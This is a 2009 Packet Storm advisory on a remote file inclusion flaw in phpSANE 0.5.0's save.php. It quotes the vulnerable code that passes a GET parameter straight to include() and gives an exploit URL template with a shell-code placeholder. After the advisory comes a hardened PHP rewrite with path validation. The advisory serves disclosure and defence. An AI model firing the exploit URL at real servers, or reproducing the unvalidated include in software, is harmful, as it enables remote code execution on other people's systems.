phpSANE 0.5.0 Remote File Inclusion

2009-08-27T00:00:00
ID PACKETSTORM:80723
Type packetstorm
Reporter CoBRa_21
Modified 2009-08-27T00:00:00

Description

                                        
-----------------------------------------------------------------------------------  
phpSANE v 0.5.0 (save.php) Remote File Inclusion Vulnerability  
-----------------------------------------------------------------------------------  
Author: CoBRa_21  
Mail: uyku_cu@windowslive.com  
Script Download: http://sourceforge.net/projects/phpsane/  
Dork: None :P  
-----------------------------------------------------------------------------------  
BUG  
<?PHP  
include("language.php");  
  
$file_save = $_GET['file_save'];  
$file_save_image = $_GET['file_save_image'];  
$lang_id = $_GET['lang_id'];  
  
if ($file_save_image)  
{  
echo "<p class=\"align_center\">\n";  
echo "<img src=\"".$file_save."\" border=\"2\">\n";  
echo "</p>\n";  
}  
else  
{  
// my_pre my_mono  
echo "<p class=\"my_pre\">\n";  
include($file_save); // $file_save comes straight from $_GET['file_save'] with no validation  
echo "</p>\n";  
echo "<hr>\n";  
}  
-----------------------------------------------------------------------------------  
Exploit  
http://localhost/path/save.php?file_save= (Shell Code)  
-----------------------------------------------------------------------------------  
May the holy month of Ramadan be auspicious and blessed for the entire Islamic world.  
-----------------------------------------------------------------------------------  
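
A hardened form of the save.php logic quoted under BUG, as an added example that is not part of the advisory or of phpSANE's own code. It assumes scan output lives in a single directory (the hypothetical `SAVE_DIR`, served under `tmp/`); `resolve_saved_file()` is a helper named here for illustration.

```php
<?php
// Added example, not phpSANE code. SAVE_DIR is an assumed scan-output directory.
const SAVE_DIR = __DIR__ . '/tmp';

// Map a user-supplied name to a real file inside $baseDir, or return null.
function resolve_saved_file(string $name, string $baseDir): ?string
{
    // Reject empty names, NUL bytes and scheme-prefixed values (http://, ftp://, php://, data:).
    if ($name === '' || strpos($name, "\0") !== false
        || preg_match('#^[a-z][a-z0-9+.-]*:#i', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // basename() drops every directory component, so "../" cannot leave $base.
    $path = realpath($base . DIRECTORY_SEPARATOR . basename($name));
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Containment check after realpath() has resolved any symlink.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

$raw  = $_GET['file_save'] ?? '';
$path = is_string($raw) ? resolve_saved_file($raw, SAVE_DIR) : null;
if ($path === null) {
    http_response_code(400);
    exit('Invalid file_save parameter');
}

if (!empty($_GET['file_save_image'])) {
    // Only the validated basename reaches the attribute, URL- and HTML-encoded.
    $src = 'tmp/' . rawurlencode(basename($path));
    echo "<p class=\"align_center\">\n";
    echo '<img src="' . htmlspecialchars($src, ENT_QUOTES, 'UTF-8') . "\" border=\"2\">\n";
    echo "</p>\n";
} else {
    // The file is read as data and HTML-escaped; it is never parsed as PHP.
    echo "<p class=\"my_pre\">\n";
    echo htmlspecialchars((string) file_get_contents($path), ENT_QUOTES, 'UTF-8');
    echo "</p>\n";
    echo "<hr>\n";
}
```

Setting `allow_url_include = Off` in php.ini makes PHP refuse URL wrappers in `include()`, but the allowlist is still needed because local paths would remain includable.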
  
  